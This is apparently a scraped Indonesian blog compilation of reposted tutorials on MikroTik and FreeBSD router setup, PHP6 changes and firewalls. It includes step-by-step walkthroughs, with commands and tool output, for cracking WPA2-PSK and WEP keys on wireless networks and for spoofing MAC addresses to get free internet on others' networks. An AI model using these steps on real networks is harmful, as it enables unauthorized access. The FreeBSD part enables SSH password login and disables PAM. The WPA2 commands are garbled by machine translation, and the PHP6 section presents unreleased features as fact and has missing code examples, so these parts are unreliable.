Setting Router Mikrotik

Langkah-langkah berikut adalah dasar-dasar setup mikrotik yang dikonfigurasikan untuk jaringan
sederhana sebagai gateway server.
1. Langkah pertama adalah install Mikrotik RouterOS pada PC atau pasang DOM.
2. Login Pada Mikrotik Routers melalui console :
MikroTik v2.9.7
Login: admin
Password: (kosongkan)
Sampai langkah ini kita sudah bisa masuk pada mesin Mikrotik. User default adalah admin
dan tanpa password, tinggal ketik admin kemudian tekan tombol enter.
3. Untuk keamanan ganti password default
[admin@Mikrotik] > password
old password: *****
new password: *****
retype new password: *****
[admin@ Mikrotik]] >
4. Mengganti nama Mikrotik Router, pada langkah ini nama server akan diganti menjadi “telsa” (nama ini sih bebas2 aja mo diganti)
[admin@Mikrotik] > system identity set name=telsa
[admin@telsa] >
5. Melihat interface pada Mikrotik Router
[admin@telsa] > interface print
Flags: X - disabled, D - dynamic, R - running
# NAME TYPE RX-RATE TX-RATE MTU
0 R ether1 ether 0 0 1500
1 R ether2 ether 0 0 1500
[admin@telsa] >
6. Memberikan IP address pada interface Mikrotik.
Misalkan ether1 akan kita gunakan untuk koneksi ke Internet dengan IP 192.168.0.1 dan ether2 akan kita gunakan untuk network local kita dengan IP 172.16.0.1
[admin@telsa] > ip address add address=192.168.0.1
netmask=255.255.255.0 interface=ether1
[admin@telsa] > ip address add address=172.16.0.1
netmask=255.255.255.0 interface=ether2
7. Melihat konfigurasi IP address yang sudah kita berikan
[admin@telsa] >ip address print
Flags: X - disabled, I - invalid, D - dynamic
# ADDRESS NETWORK BROADCAST INTERFACE
0 192.168.0.1/24 192.168.0.0 192.168.0.63 ether1
1 172.16.0.1/24 172.16.0.0 172.16.0.255 ether2
[admin@telsa] >
8. Memberikan default Gateway, diasumsikan gateway untuk koneksi internet adalah 192.168.0.254
[admin@telsa] > /ip route add gateway=192.168.0.254
9. Melihat Tabel routing pada Mikrotik Routers
[admin@telsa] > ip route print
Flags: X - disabled, A - active, D - dynamic,
C - connect, S - static, r - rip, b - bgp, o - ospf
# DST-ADDRESS PREFSRC G GATEWAY DISTANCE INTERFACE
0 ADC 172.16.0.0/24 172.16.0.1 ether2
1 ADC 192.168.0.0/26 192.168.0.1 ether1
2 A S 0.0.0.0/0 r 192.168.0.254 ether1
[admin@telsa] >
10. Tes Ping ke Gateway untuk memastikan konfigurasi sudah benar
[admin@telsa] > ping 192.168.0.254
192.168.0.254 64 byte ping: ttl=64 time<1 ms
192.168.0.254 64 byte ping: ttl=64 time<1 ms
2 packets transmitted, 2 packets received, 0% packet loss
round-trip min/avg/max = 0/0.0/0 ms
[admin@telsa] >
11. Setup DNS pada Mikrotik Routers
[admin@telsa] > ip dns set primary-dns=192.168.0.10 allow-remoterequests=no
[admin@telsa] > ip dns set secondary-dns=192.168.0.11 allow-remoterequests=no
12. Melihat konfigurasi DNS
[admin@telsa] > ip dns print
primary-dns: 192.168.0.10
secondary-dns: 192.168.0.11
allow-remote-requests: no
cache-size: 2048KiB
cache-max-ttl: 1w
cache-used: 16KiB
[admin@telsa] >
13. Tes untuk akses domain, misalnya dengan ping nama domain
[admin@telsa] > ping yahoo.com
216.109.112.135 64 byte ping: ttl=48 time=250 ms
10 packets transmitted, 10 packets received, 0% packet loss
round-trip min/avg/max = 571/571.0/571 ms
[admin@telsa] >
Jika sudah berhasil reply berarti seting DNS sudah benar.
14. Setup Masquerading,
Jika Mikrotik akan kita pergunakan sebagai gateway server maka agar client computer pada network dapat terkoneksi ke internet perlu kita masquerading.
[admin@telsa]> ip firewall nat add action=masquerade outinterface=
ether1 chain:srcnat
[admin@telsa] >
15. Melihat konfigurasi Masquerading
[admin@telsa]ip firewall nat print
Flags: X - disabled, I - invalid, D - dynamic
0 chain=srcnat out-interface=ether1 action=masquerade
[admin@telsa] >
Setelah langkah ini bisa dilakukan pemeriksaan untuk koneksi dari jaringan local. Dan jika berhasil berarti kita sudah berhasil melakukan instalasi Mikrotik Router sebagai Gateway server. Setelah terkoneksi dengan jaringan Mikrotik dapat dimanage menggunakan WinBox
yang bisa di download dari Mikrotik.com atau dari server mikrotik kita.
Misal Ip address server
mikrotik kita 192.168.0.1, via browser buka http://192.168.0.1 dan download WinBox dari situ.
Jika kita menginginkan client mendapatkan IP address secara otomatis maka perlu kita setup dhcp server pada Mikrotik. Berikut langkah-langkahnya :
1.Buat IP address pool
/ip pool add name=dhcp-pool ranges=172.16.0.10-172.16.0.20
2. Tambahkan DHCP Network dan gatewaynya yang akan didistribusikan ke client
Pada contoh ini networknya adalah 172.16.0.0/24 dan gatewaynya 172.16.0.1
/ip dhcp-server network add address=172.16.0.0/24 gateway=172.16.0.1
3. Tambahkan DHCP Server
( pada contoh ini dhcp diterapkan pada interface ether2 )
/ip dhcp-server add interface=ether2 address-pool=dhcp-pool
4. Lihat status DHCP server
[admin@telsa]> ip dhcp-server print
Flags: X - disabled, I - invalid
# NAME INTERFACE RELAY ADDRESS-POOL LEASE-TIME ADD-ARP
0 X dhcp1 ether2
Tanda X menyatakan bahwa DHCP server belum enable maka perlu dienablekan terlebih dahulu pada langkah 5.
5. Jangan Lupa dibuat enable dulu dhcp servernya
/ip dhcp-server enable 0
kemudian cek kembali dhcp-server seperti langkah 4, jika tanda X sudah tidak ada berarti sudah aktif.
6. Tes Dari client
c:\>ping www.yahoo.com
untuk bandwith controller, bisa dengan sistem simple queue ataupun bisa dengan mangle
[admin@telsa] queue simple> add name=Komputer01
interface=ether2 target-address=172.16.0.1/24 max-limit=65536/131072
[admin@telsa] queue simple> add name=Komputer02
interface=ether2 target-address=172.16.0.2/24 max-limit=65536/131072
dan seterusnya…

Sumber : http://tegal.forumotion.com/t3-setting-router-mikrotik
Read more...

Konfigurasi PC Router dengan FreeBSD

Sebelum memulai tahap membuat router terlebih dahulu kita membahas pengertian router sebenarnya.

Apa itu router? Router yaitu suatu perangkat keras jaringan yang menghubungkan dua jaringan yang berbeda dan biasanya dipergunakan sebagai gateway keinternet.

Router terbagi menjadi dua macam :
1.router hardware : hardware yang dibuat oleh suatu perusahaan tertentu yang khusus digunakan untuk router.
2.pc router : pc komputer yang dijadikan sebagai router yang didalamnya sudah terinstal os yang sudah di setting sebagai router.

Macam-macam os(operating system) yang bisa digunakan sebagai pc router
Seperti : windows os,ubuntu os,redhat os,FreeBSD os,dll yang terbaru sekarang adalah mikrotik router.

Dan yang saya gunakan sekarang adalah FreeBSD,
Iso FreeBSD dapat di download di website: http://www.freebsd.org
http://www.distrowatch.com
paket-paket FreeBSD dapat didownload di : ftp.freebsd.org
http://www.freebsdsoftware.org/

Router yang akan kita buat ini nantinya akan kita fungsikan sebagai server gateway pada LAN (Local Area Network) kita. Melalui gateway inilah komputer-komputer yang ada pada LAN kita bisa terhubung ke Internet, sehingga bisa melakukan browsing, chatting, download, dll.



Langkah-Langkah Setting Router:

1. Konfigurasi Kernel
a. Login sebagai root, sehingga akan muncul prompt # (tanda pagar).

b.Kemudian masuk ke direktory kernelnya dengan mengetik perintah seperti dibawah ini:
# cd /usr/src/sys/i386/conf
# ll
kernel aslinya adalah file yang bernama GENERIC, untuk menghindari resiko yang fatal sebaiknya kernel kita copy dengan mengetikkan perintah :
#cp GENERIC
untuk contoh dsni kita beri nama router. Ketikkan :
#cp GENERIC ROUTER
(FreeBSD sensitive terhadap huruf besar atau kecil jadi hati-hatilah dalam mengetikkan command)


c. Edit kernel ROUTER dengan editor di FreeBSD
Tujuan edit kernel:
o Mengurangi dan atau manambah option atau device
o Identifikasi nama kernel
Contoh-contoh editor antara lain :
? pico
? ee(easy editor)
? smacs,dll
Yang kita gunakan di sini adalah ee.
Langkah-langkah edit kernel :
# ee ROUTER
setelah muncul text editor AKU hapus line yang ada tanda pagar karena tidak terbaca kurangi juga device yang tidak dibutuhkan.
Tambahkan script dibawah ini di file kernel ROUTER:

options IPDIVERT
options IPFIREWALL # driver untuk ipfw
options IPFIREWALL_VERBOSE
options IPFIREWALL_VERBOSE_LIMIT=10 # utk mencegah syslog flooding
options IPFIREWALL_DEFAULT_TO_ACCEPT
options IPFIREWALL_FORWARD
options IPFILTER
options DUMMYNET

device pf
device pflog

Tekan tombol Q dan simpan

# config ROUTER

d. Masuk directory kernel baru(ROUTER)
# cd ../compile/ROUTER
# make depend && make && make install && reboot
tunggulah karena proses compile kernel sedang berlangsung lama sesuai dengan prosesor yang
anda miliki
reboot


2. Setting IP

a.Konfigurasi IP Address:
Setting IP bisa melalui sysinstall :
# sysinstall > Networking > Interface > (nama lan card cth rl0) > setting
Untuk melihat configurasi yang telah kita buat ketikkan :
# more /etc/rc.conf

Jika kita ingin menginstall IP lewat command langsung ketikkan :
# ee /etc/rc.conf
hostname=”haniv.net”
ifconfig_rl0=”inet 202.34.0.2 netmask 255.255.255.240? # ke internet
ifconfig_rl1=”inet 192.168.0.1 netmask 255.255.255.0? # ke LAN
defaultrouter=”202.34.0.1?
(disini sebagai contoh penginstallan IP lewat command langsung, anda bisa mengganti spin.net,255.255.255.240 sesuai IP dan hostname anda)

3.Aktifkan beberapa daemon
ketikkan :

# ee etc/defaults/rc.conf
(minimal anda harus mengaktifkan ssh,IPNAT,gateway default router,untuk send mail jangan diaktifkan agar saat kita menghidupkan computer tidak harus mengirim e-mail terlebih dahulu)

selanjutnya akan muncul spt dibawah ini:
defaultrouter =”NO” =>(jadikan) “YES”
gateway_enable = “NO” => “YES”
sshd_enable =”NO” => ”YES” # (agar bisa remote dgn putty)
firewall_enable =”NO” => ”YES” # (sebagai filter)
firewall_type =”CLOSE” => ”OPEN”
natd_enable =”NO” => ”YES”
natd_interface =”rl0? # (lan card yg disambung ke IP Public / internet.)
sendmail semulanya yang “YES” diganti “NO” untuk men-disable service sendmail.
simpan konfigurasi ini, kemudian reboot komputer:

# reboot

aktifkan perintah super user
# pw user mod catur -G wheel
# groups catur

# echo 'UsePAM no' >>/etc/ssh/sshd_config
# echo 'PasswordAuthentication yes' >>/etc/ssh/sshd_config
# /etc/rc.d/sshd restart


semoga bermanfaat..


Sumber : http://cumanpengenberbagi.blogspot.com/2010/05/konfigurasi-router-freebsd.html

Read more...

Crack WPA2-PSK

Pada prinsip nya tutorial ini hampir sama dengan crack WPA.

Langkah-langkah dasar:

* Masukkan antarmuka mode monitor
* Cari jaringan nirkabel (dilindungi dengan WPA2 dan Pre Shared Key)
* Ambil semua paket
* Tunggu sampai Anda melihat deauthenticate klien dan klien, sehingga jabat tangan yang dapat ditangkap
* Crack tombol menggunakan file kamus (atau melalui John The Ripper)



Saya akan menggunakan DWL Teknis-G122 (USB) interface jaringan nirkabel untuk prosedur ini. Dalam backtrack4, perangkat ini diakui sebagai wlan0.

Pertama, memasukkan kartu ke dalam mode monitor:

root @ bt: ~ # airmon-ng

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]

root @ bt: ~ # airmon-ng start wlan0

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
(Monitor mode diaktifkan pada mon0)

Ok, kita sekarang dapat menggunakan antarmuka mon0

Mari kita menemukan jaringan nirkabel yang menggunakan WPA2 / PSK:

root @ bt: ~ # airodump-ng mon0

CH 6] [TERPAKAI: 4 s] [2009/02/21 00:57

BSSID PWR Beacons # Data, # / s CH MB AUTH ESSID Cipher enc

00:19:05 B: 52: AD: F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet

BSSID STATION PWR Lost Tingkat Probe Paket

00:19:05 B: 52: AD: F7 00:01 C: BF: 90:5 B: A3 -29 0-1 12 4 TestNet

Berhenti airodump-ng dan jalankan lagi, menulis semua paket ke disk:

mon0 airodump-ng - channel 10 - 00:19:05 bssid B: 52: AD: F7-w / tmp/wpa2

Pada titik ini, Anda punya opsi 2: baik menunggu sampai klien menghubungkan dan jabat tangan 4-arah yang lengkap, atau deauthenticate klien yang ada dan dengan demikian memaksanya untuk reassociate. Waktu adalah uang, jadi mari kita kekuatan deauthenticate tersebut. Kami membutuhkan bssid dari AP (-a) dan mac dari klien yang terhubung (-c)

root @ bt: ~ # aireplay-ng -0 1-a 00:19:05 B: 52: AD: F7-c 00:01 C: BF: 90:5 B: mon0 A3
13:04:19 Menunggu frame suar (BSSID: 00:19:05 B: 52: AD: F7) pada saluran 10
Mengirim 13:04:20 diarahkan DeAuth 64. STMAC: [00:01 C: BF: 90:5 B: A3] [67 | 66 ACK]

Akibatnya, airodump-ng harus menunjukkan "WPA Handshake:" di sudut kanan atas

CH 10] [TERPAKAI: 2 menit] [2009/02/21 13:04] [jabat tangan WPA: 00:19:05 B: 52: AD: F7

BSSID PWR Beacons # Data RXQ, # / s CH MB AUTH ESSID Cipher enc

00:19:05 B: 52: AD: F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet

BSSID STATION PWR Lost Tingkat Probe Paket

00:19:05 B: 52: AD: F7 00:01 C: BF: 90:5 B: A3 -27 54-54 0 230

Berhenti airodump-ng dan pastikan file diciptakan dengan benar

root @ bt: / # ls / tmp/wpa2 *-al
-Rw-r - r - 1 root root 35189 2009/02/21 13:04 / tmp/wpa2-01.cap
-Rw-r - r - 1 root root 476 2009/02/21 13:04 / tmp/wpa2-01.csv
-Rw-r - r - 1 root root 590 2009/02/21 13:04 / tmp/wpa2-01.kismet.csv

Formulir titik ini, Anda tidak perlu mendekati jaringan nirkabel. Semua cracking akan terjadi offline, sehingga Anda dapat berhenti airodump dan proses lainnya dan bahkan berjalan jauh dari AP. Bahkan, saya sarankan untuk pergi dan menemukan sendiri tempat yang nyaman di mana Anda dapat tinggal, makan, tidur, dll .... Cracking kunci PSK WPA2 didasarkan pada bruteforcing, dan dapat memakan waktu yang sangat sangat lama. Ada 2 cara bruteforcing: salah satu yang relatif cepat namun tidak menjamin kesuksesan dan salah satu yang sangat lambat, tapi menjamin bahwa Anda akan menemukan tombol di beberapa titik waktu

Opsi pertama adalah dengan menggunakan worklist suatu / file drstionary. Banyak file-file ini dapat ditemukan di internet (misalnya www.theargon.com atau di packetstorm (lihat arsip)), atau dapat dihasilkan dengan alat seperti John The Ripper. Setelah wordlist yang dibuat, semua yang perlu Anda lakukan adalah menjalankan aircrack-ng dengan worklist dan pakan dalamnya fie tutup yang berisi Handshake WPA2..

Jadi jika Anda wordlist disebut word.lst (bawah / tmp / wordlists), Anda dapat menjalankan

aircrack-ng-w / tmp / wordlists / word.lst-b 00:19:05 B: 52: AD: F7 / tmp/wpa2 topi *.


Keberhasilan retak tombol WPA2 PSK secara langsung terkait dengan kekuatan file password Anda. Dengan kata lain, Anda mungkin beruntung dan mendapatkan kunci yang sangat cepat, atau Anda mungkin tidak mendapatkan kunci sama sekali.
Metode kedua (bruteforcing) akan berhasil pasti, tapi mungkin diperlukan waktu lama untuk selesai. Ingatlah, WPA2 kunci dapat berisi hingga 64 karakter, sehingga dalam teori Anda akan membangun setiap kombinasi password dengan semua karakter set mungkin dan pakan mereka ke aircrack. Jika Anda ingin menggunakan John The Ripper untuk membuat semua kombinasi password yang mungkin dan pakan mereka ke aircrack-ng, ini adalah perintah yang digunakan:


root @ bt: ~ # / pentest / password / jtr / john - stdout - tambahan: semua aircrack-ng |-b 00:19:05 B: 52: AD: F7-w - / tmp/wpa2 topi *.

(Catatan: PSK di testlab saya hanya 8 karakter, berisi satu karakter huruf besar dan 4 angka). Saya akan posting hasil ketika kunci retak, termasuk waktu yang diperlukan untuk memecahkan kuncinya.

Sumber : http://masddy.web.id/index.php?option=com_content&view=article&id=58&Itemid=64
Read more...

MEMBOBOL MAC address

1. Jalankan Live CD Distro Linux BackTrack
2, masukkan username “root”, lalu masukkan
password “toor”.
2. Setelah muncul prompt, ketikkan “startx”.
3. Setelah muncul desktop environment KDE, klik tombol “K” (di pojok kiri bawah). Pilih
BackTrack ? Radio Network Analysis -> 80211 ? Analyser ? Kismet.
4. Lalu muncul window “Select Network Device”, pilih “wifi0”. Klik “OK”.
5.Muncul tampilan Kismet, secara otomatis Kismet akan mencari wireless client yang sedang
aktif. Bila ditemukan wireless client yang aktif tetapi tidak terhubung dengan jaringan,
maka akan muncul pesan “ALERT: Suspicious client 00:02:6F:37:08:20 - probing
networks but never participating.”
6. Bila Kismet berhasil menemukan Access Point yang aktif, maka akan muncul pesan “Found
IP 192.168.2.1 for kotik::00:0E:2E:C2:2C:0E via ARP”.

Keterangan:
kotik -> nama SSID

7.
Tutup Kismet, lalu buka console untuk menjalankan tools scanning yang lain, yakni
airodump.

Keterangan:
Bila kita menggunakan program scanning yang lain, biasanya program pertama akan
membuat driver wireless kita “rusak”. Untuk dapat digunakan pada program yang kedua,
kita perlu memperbaiki driver tersebut (dimatikan lalu dihidupkan kembali).

8. Cara memperbaiki driver, ketik:

#airmon-ng -> untuk mengecek interface yang tersedia.

Matikan driver “ath0” dan “ath1” dengan mengetik:
#airmon-ng stop ath0

#airmon-ng stop ath1 -> bila interface ath1 ada.

9.Mengaktifkan driver yang baru, ketik:

#airmon-ng start wifi0


10. Bila diketikkan perintah #iwconfig , maka muncul informasi “ath0” sudah aktif dengan
Mode=Monitor.
11.Berikutnya, ketik #airodump-ng ath0
12.Dengan demikian maka kesimpulan bahwa dengan airodump mendapatkan hasil scanning
MAC Address Client yang lebih cepat dibandingkan dengan menggunakan Kismet. Tetapi
Client IP Address tidak bisa didapatkan, kecuali menggunakan Kismet.
13.Kita juga dapat menggunakan program K-MAC(atau anda bisa merubah MAC Address
melalui regedit) yang di-install pada windows untuk merubah MAC-Address Wireless kita
menjadi MAC-Address salah satu client yang terdaftar pada MAC Address Filtering.
14.Yang perlu dilakukan adalah mencari informasi MAC-Address client dengan mengunakan
Kismet atau airodump, catat MAC-Address tersebut, lalu jalankan K-MAC di windows dan
ubah MAC-Addressnya.
15. Setelah restart komputer/laptop anda, dan mulai berinternet gratis deh........

Sumber : http://ahmad-sutikno.blogspot.com/2009/04/membobol-mac-address.html
Read more...

Cara Hack WEP 128 bit

Pada dasarnya setingan keamanan pada Akses Point (AP) terdiri dari beberapa mode, tetapi rata-rata menggunakan setingan yang simple untuk memudahkan pengaksessan. Karena terkadang semakin tinggi tingkat keamanan maka tingkat kenyamanan semakin berkurang. WEP adalah Wired Eqivalent Privacy, yang panjang key 64 bitnya hanya 10 digit bilangan heksadesimal atau 5 digit alpha-numeric, sedangkan untuk 128 bit key terdiri dari 26 digit heksadesimal atau 13 digit alpha-numeric. Algoritma pemograman wep tergolong ke dalam algoritma RC4, dimana terdapat kelemahan pada ekripsi ini yaitu adanya perulangan byte sehingga memungkinkan untuk dicrack jika variable ivs nya mencukupi.Saat melakukan proses hacking wep, menggunakan OS linuk turunan slackware yaitu backtrack versi 2.0 Final, dan menggunakan laptop Compaq V3103TU Presario V3000 dan menggunakan usb wireless adapter DWL G-122 rec C v.3.0.Secara umum langkah-langkahnya adalah sebagai berikut:
1. Jalankan OS Back Track v.2.0 Final dengan Laptop. Lalu cek konfigurasi adapater usb wifi dengan meggunakan shell.Ketikkan:
Ifconfig rausb0
Iwconfig rausb0
2. Setelah konfigurasi selesai, lalu jalankan airodump-ng untuk mengetahui channel berapa yang aktif, apa nama ssidnya, mac /client berapa saja yang sudah konek, ada tidaknya filrtering mac, yang tentunya untuk memudahkan kita melakukan monitoringdengan menggunakan shell ketikkan:
airodump-ng rausb0
3. Setelah mengetahui target berada di channel berapa, ssid nya apa, essid nya apa, ada tidaknya client yang konek, maka batalkan airodump-ng dari shell dengan menekan control+C. lalu misalnya kita ingin menyerang essid CIPUTIH bssid 00:18:f8:36:83:47 operasinya di channel 8, maka untuk menangkap paket yang dipancarkan oleh AP (Access Point) tersebut maka jalankan perintah:
iwconfig rausb0 mode monitor channel 8
airodump-ng -- channel 8 --ivs -w namafile rausb0
shell ini jangan ditutup sampai mendapatkan key wep pada langkah aircrack-ng
4. Setelah itu, jika aktivitas lan sedikit, artinya tidak ada client yang connect, harus menggunakan Fake Authentification dengan membuka shell baru, lalu ketikkan:
Aireplay-ng -1 -30 -e CIPUTIH Ć¢€“a 00:18:f8:36:83:47 -h (mac address yang di izinkan konek) rausb0
Lakukan fake authentification sampai muncul balasan jawaban:Authentification successfulKeep live sending packetLakukan terus sampai mendapatkan key wep pada langkah aircrack-ng
5 Lalu jalan shell yang lain untuk melakukan injeksi arp request (dalam hal ini hanya card tertentu saja yang mendukung untuk melakukan injeksi), jalankan command:
Aireplay-ng -3 Ć¢€“b 00:18:f8:36:83:47 -h (mac address yang di izinkan konek) rausb0
Lalu tinggal menunggu agar paket arp injeksi terkirim dan paket arp request diterima, paket yang diterima berupa paket ivs ini akan tersimpan dalam file pertama tadi di atas ketika menjalan shell airodump-ng -- channel 8 --ivs -w namafile rausb0
6. Untuk ngecrack password wep, sambil menunggu paket yang terkumpul, jalan shell baru ketikkan
aircrack-ng Ć¢€“e CIPUTIH -b 00:18:f8:36:83:47 (namafile).ivs
lalu aircrack-ng ini akan mencari semua kemungkinan key wepnya.Tunggu sampai mendapat display
Key Found (B1:92:27:EF:6E) Probability 100%7. matikan shell airodump-ng, aireplay-ng, lalu buka shell baru. Lalu lakukan otentifikasi dengan cara:
iwconfig rausb0 mode managed Ć¢€“e CIPUTIH key B1:92:27:EF:6E
lalu lakukan otomatisasi dhcp dengan mengetikkan perintah:dhcpcd rausb0
lalu lakukan ping ke salah satu web site misalnya:ping yahoo.com
kalo jawaban dari ping TTL=bla bla berarti anda sudah terkoneksi ke internet

Untuk membobol wep 64 bit biasanya banyaknya paket yang dibutuhkan sekitar 250 ribu ivs lebih, untuk wep 128 bit 500 ribu atau lebih.
Reference:
http://ahmad-sutikno.blogspot.com/2009/04/cara-ngehack-wep-128-bit-wi-fi.html
Read more...

Perbedaan Versi PHP6 dengan PHP Versi sebelumnya

  1. Mendukung Unicode

Pasti anda bingung dengan istilah Unicode, dan ingin bertanya apa Unicode? Unicode adalah satu cara dalam pengaturan kode biner untuk text dan bentuk tulisan lainnya. Metoda ini diharap dapat menjembatani berbagai karakter yang tidak sama dengan tulisan latin. Contohnya tulisan Cina, Arab, Aksara Bali, dan lain sebagainya.

Unicode mendukung seluruh sistem penulisan yang ada di dunia ini. Unicode merupakan karakter set dengan kemampuan multi-lingual(multi bahasa). Saat ini hampir seluruh os mendukungnya. Unicode merupakan sistem pengkodean yang digunakan selain ASCII dan EBCDIC pada system kompoter. Istilah Unicode ini sering juga disebut dengan Double Buye Character. Set karakter ASCII yang menggunakan dua bytes untuk tiap karakter. Mampu mengolah 65.536 kombinasi karakter sehingga mampu mengolah kata dari beragam bahasa di dunia.

2. Register Global di tiadakan

Pasti bingung lagi dengan istilah Register Global? Register Global adalah merupakan salah satu pengaturan yang berada di dalam file php.ini yang bertugas untuk mengatur apakah variabel-variabel EGCPS (environment, get, post, cookie, server) akan didaftarkan sebagai variabel global atau tidak.

Biasanya pengaturan defaultnya untuk register globals adalah on tetapi ada juga di beberapa webserver seperti xampp defaultnya off.

Sekarang apa bedanya register globals on dengan off ? Bedanya adalah apabila pengaturan register globals on maka kita dapat menyebutkan nama variabelnya yang berasal dari get, post, cookie, session, dan server secara langsung misalnya $simpan, Contoh :

Berbeda jika pengaturan register globals off, kita harus memanggil variabelnya :

  1. Jika method yang digunakan adalah post, maka dituliskan dengan cara $_POST[simpan],
  2. Jika method yang digunakan adalah get, maka dituliskan dengan cara $_GET[simpan],
  3. Jika method yang digunakan adalah cookie, maka dituliskan dengan cara $_COOKIE[simpan], dan
  4. Jika method yang digunakan adalah session, maka dituliskan dengan cara $_SESSION[simpan].

Contohnya :

Biasanya pengaturan defaultnya untuk register globals adalah on tetapi ada juga di beberapa webserver seperti xampp defaultnya off.

Sekarang apa bedanya register globals on dengan off ? Bedanya adalah apabila pengaturan register globals on maka kita dapat menyebutkan nama variabelnya yang berasal dari get, post, cookie, session, dan server secara langsung misalnya $simpan, Contoh :

Nah, karena di PHP6 Register Global sudah di tiadakan maka kita harus memanggil variablenya mengikuti pengaturan pemanggilan variabelnya menggunakan register globals off.

3. Safe Mode di tiadakan

4. Magic Quotes di tiadakan

Setting magic quotes (magic_quotes, magic_quotes_sybase ataupun magic_quotes_gpc) berfungsi untuk memberikan keamanan pada setiap inputan dari sisi client. karena cukup direpotkann dengannya adanya kesalahanan “undefined functionget_magic_quotes_gpc() pada beberapa halaman, oleh karena itu lakukan langkah persuasif dengan cara mendeklarasikan fungsi get_magic_quotes_gpc() yang hanya mengembalikan nilai false,Contoh :

5. Call Time Pass by Reference di tiadakan

Apabila anda menemukan error “Assigning the return value of new by reference is deprecated“, maka hilangkan saja tanda “&” pada deklarasi object, Contoh:

6. Semua fungsi Case Sensitive

PHP6 membedakan penulisan besar kecil huruf, jadi variabel $simpan berbeda dengan $Simpan. Dimulai dari PHP6, semua fungsi yang built in dari PHP diharap dituliskan secara lowercase.

7. Ereg pindah ke Preg

Gunakanlah fungsi preg untuk regular expression daripada ereg. karena preg dapat dieksekusi lebih cepat.

8. Pengambilan satu karakter pada karakter string gunakkan [].

Pada awalnya PHP menyarankan menggunakan tanda {} untuk mengakses salah satu karakter dalam string. Mulai dari PHP6, pengambilan 1 karakter pada string gunakanlah tanda [], Contoh :


Sumber : http://cayozie.wordpress.com/2010/02/23/perbedaan-versi-php6-dengan-php-versi-sebelumnya/

Read more...

Firewall

Firewall

http://upload.wikimedia.org/wikipedia/id/thumb/d/d6/Ilustrasi-Firewall.png/200px-Ilustrasi-Firewall.png

http://bits.wikimedia.org/skins-1.5/common/images/magnify-clip.png

Ilustrasi mengenai Firewall

Firewall atau tembok-api adalah sebuah sistem atau perangkat yang mengizinkan lalu lintas jaringan yang dianggap aman untuk melaluinya dan mencegah lalu lintas jaringan yang tidak aman. Umumnya, sebuah tembok-api diterapkan dalam sebuah mesin terdedikasi, yang berjalan pada pintu gerbang (gateway) antara jaringan lokal dan jaringan lainnya. Tembok-api umumnya juga digunakan untukmengontrol akses terhadap siapa saja yang memiliki akses terhadap jaringan pribadi dari pihak luar. Saat ini, istilah firewall menjadi istilah lazim yang merujuk pada sistem yang mengatur komunikasi antar dua jaringan yang berbeda. Mengingat saat ini banyak perusahaan yang memiliki akses ke Internet dan juga tentu saja jaringan berbadan hukum di dalamnya, maka perlindungan terhadap modal digital perusahaan tersebut dari serangan para peretas, pemata-mata, ataupun pencuri data lainnya, menjadi hakikat.

Dari sember lain :

Firewall adalah sebuah perangkat lunak (yang dapat digabungkan dengan perangkat keras dalam beberapa kasus) yang dirancang untuk melindungi jaringan private dari akses yang tidak sah. Sebuah firewall biasanya blok lalu lintas yang tidak diinginkan dari luar ke dalam jaringan dan sebaliknya.

Firewall Oleh karena itu seperti pagar antara dua zona: dalam dan di luar jaringan.Bayangkan sebuah benteng yang dipertahankan dari gangguan militer oleh parit atau kebakaran di sekitar. Benteng adalah jaringan pribadi. Secara teknis, saya menyebutnya sebagai batas antara (dalam) terpercaya dan zona (luar) non-dipercaya.

firewall

Tantangan pada firewall semakin berat sebagai garis demarkasi antara apa yang dipercaya dan apa yang tidak adalah semakin kabur, sehingga membuatnya sulit untuk firewall untuk memutuskan untuk memastikan apakah akan membolehkan lalu lintas tertentu atau tidak.

Firewall tidak melindungi jaringan saja, tetapi komputer. Anda dapat menginstal firewall pada komputer anda, dan akan melindunginya dari luar jaringan anda menghubungkan mesin anda ke luar.

Jadi firewall ini melindungi jaringan dan sekaligus melindungi komputer di dalam jaringan tersebut. Akses yang dimaksud adalah akses remote dari komputer lain. Seperti kita ketahui sistem operasi seperti windows dan unix memiliki kemampuan jaringan yaitu menghubungkan dua atau lebih komputer untuk saling berkomunikasi dan menggunakan sumber daya jaringan seperti printer, scanner dan alat-alat lainnya termasuk koneksi internet. Untuk itu diperlukan sebuah mekanisme atau aturan untuk membatasi akses sebuah komputer ke komputer lain dan sumber daya jaringan lainnya. Untuk itu perlu diinstall Firewall dalam jaringan tersebut. Cara yang paling banyak digunakan adalah menginstall perangkat lunak atau software Firewall seperti Sygate Firewall, McAfee, BitDefender atau Zone Alarm. Biasanya antivirus memiliki fasilitas ini. Cara lain adalah menggunakan perangkat keras atau alat yang berfungsi sebagai Firewall. Tentunya alat ini memiliki kelebihan dan kemampuan yang lebih dalam membatasi akses ke jaringan dibanding berupa perangkat lunak. Namun harganya lebih mahal jika dibanding dengan Sygate Firewall yang bisa didownload gratis.

Jenis-jenis Firewall

http://upload.wikimedia.org/wikipedia/id/thumb/b/b4/Firewall-TaksonomiFirewall.png/200px-Firewall-TaksonomiFirewall.png

http://bits.wikimedia.org/skins-1.5/common/images/magnify-clip.png

Taksonomi Firewall

Firewall terbagi menjadi dua jenis, yakni sebagai berikut

§ Personal Firewall: Personal Firewall didesain untuk melindungi sebuah komputer yang terhubung ke jaringan dari akses yang tidak dikehendaki. Firewall jenis ini akhir-akhir ini berevolusi menjadi sebuah kumpulan program yang bertujuan untuk mengamankan komputer secara total, dengan ditambahkannya beberapa fitur pengaman tambahan semacam perangkat proteksi terhadap virus,anti-spyware, anti-spam, dan lainnya. Bahkan beberapa produk firewall lainnya dilengkapi dengan fungsi pendeteksian gangguan keamanan jaringan (Intrusion Detection System). Contoh dari firewall jenis ini adalah Microsoft Windows Firewall (yang telah terintegrasi dalam sistem operasi Windows XP Service Pack 2, Windows Vista danWindows Server 2003 Service Pack 1), Symantec Norton Personal Firewall, Kerio Personal Firewall, dan lain-lain. Personal Firewall secara umum hanya memiliki dua fitur utama, yakni Packet Filter Firewall dan Stateful Firewall.

